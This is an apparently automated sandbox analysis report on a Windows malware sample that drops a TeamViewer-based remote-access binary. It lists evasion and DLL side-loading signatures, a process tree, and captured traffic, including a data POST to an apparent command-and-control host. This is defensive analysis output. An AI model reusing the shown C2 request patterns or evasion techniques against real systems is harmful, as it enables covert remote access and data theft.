Windows Analysis Report wogZe27GBB

Overview

General Information

Sample Name: wogZe27GBB (renamed file extension from none to exe)
Analysis ID: 483790
MD5: 5efc68abd7fec415e34980d95a06a66a
SHA1: 34b243a0b3e322b8983b528caa5849395360a91d
SHA256: 0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags: exeMappingOOOsigned

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
AV process strings found (often used to terminate AV products)
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • wogZe27GBB.exe (PID: 6416 cmdline: 'C:\Users\user\Desktop\wogZe27GBB.exe' MD5: 5EFC68ABD7FEC415E34980D95A06A66A)
    • UniPrint.exe (PID: 6532 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6736 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6992 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7052 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7064 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7104 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4884 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4600 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 3888 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3864 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 3348 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6028 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6252 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 4912 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 6524 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 4420 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: wogZe27GBB.exe, ReversingLabs: Detection: 71%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll, ReversingLabs: Detection: 51%
Source: 0.2.wogZe27GBB.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, Code function: 4_2_0049B32E __EH_prolog3,CryptGenRandom,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, Code function: 4_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, Code function: 4_2_006F605B CryptReleaseContext,

Compliance:

Uses 32bit PE files
Source: wogZe27GBB.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\wogZe27GBB.exe, EXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe, DLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe, DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe, DLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe, DLL: edputil.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: iertutil.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe, DLL: urlmon.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exe, DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exe, DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, DLL: msimg32.dll
Uses secure TLS version for HTTPS connections
Source: unknown, HTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.3:49752 version: TLS 1.2
PE / OLE file has a valid certificate
Source: wogZe27GBB.exe, Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000002.516408588.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.351085287.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355552090.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.373259727.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000002.381228039.000000007098C000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\wogZe27GBB.exe, Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\wogZe27GBB.exe, Code function: 0_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\wogZe27GBB.exe, Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, Code function: 2_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, Code function: 2_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, Code function: 4_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe, Code function: 4_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,
Source: global traffic, HTTP traffic detected: POST /B8C631A8/ HTTP/1.1 Content-Length: 76431 Content-Type: multipart/form-data; boundary=--------3259937207 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: widolapsed.info Connection: Close Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master12.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /din.aspx?s=40082849&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master12.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master12.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082859&p=10000001&client=DynGate&data=FyQS7wAjHqmyuig6sTY0saWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAABSAAApKaCYgAIAAAiAAABb76jy6JCEtP10hWwK5JgAShY7zj+R7R3DOU3+0YZJRajqI5wj4APqnpqJTTfow2rFHUX7lb5rKPxXbMNzymnW3afsLjONOJOSFwYGgTrjCxDXlTyXTROrLUrNxoJ5e0wRdRUaIY3bkkZHP/DCc/GC84acwVg91URMKSdn0IIfWg== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /din.aspx?s=40082859&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master12.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master12.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082864&p=10000001&client=DynGate&data=FyQS8gCjHqmyuim0s7cwujq5MqWyvJMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJqSiHpg8MrGzGjExGLMxmpwbL5ibnBgam5gZGxuTKx6YmpcYFxscG5AoqZMhNLcwuTyegwEAAAASAAApKaCYgAIAAAiAAAB7ySFOURDklGN3FXhtz5fQYcmcXiwT9YXrd7SP4wIu0YyOFYq9yPUEQYpaG7+wnhbl5r+tU8j1VcHRkBZSOJG/A0Y7yY1YSgbi8gOUCGFRO/w26w+YKCZHaxwju7In6AFwX2azSetPIMUWj5HFTKPx6LGZM3a+27DQaxFWt7lD4A== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /din.aspx?s=40082864&client=DynGate&p=10000002 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master12.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate) Host: master12.teamviewer.com Connection: Keep-Alive Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6aGJqbGZocGBMkoh6ZnJiYGJucHBwTJbKyuDC2NLsynpiTJjC3M7qws7KetTCTJjSxsrc5sqo8uDKemBMmpKIemDwysbMaMTEYszGanBsvmJucGBqbmBkbG5MnN6ezILG6NLsypbKyuDC2NLsynpgTKTq3OjS2sp6ckym6uDg3uToysiMysLo6uTK5npiTKiGoJ6qqHpgTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=40082873&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12418339&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /dout.aspx?s=12418339&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12418339&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.198.151Connection: Keep-AliveCache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 188.172.198.151
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.317241636.000001BF6064E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316700720.000001BF60664000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316800598.000001BF60645000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.316785328.000001BF60640000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000B.00000002.317241636.000001BF6064E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.460571183.00000000057D5000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmpString found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: unknownHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76431Content-Type: multipart/form-data; boundary=--------3259937207User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70985DF0 InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,WriteFile,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=37826655&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master12.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
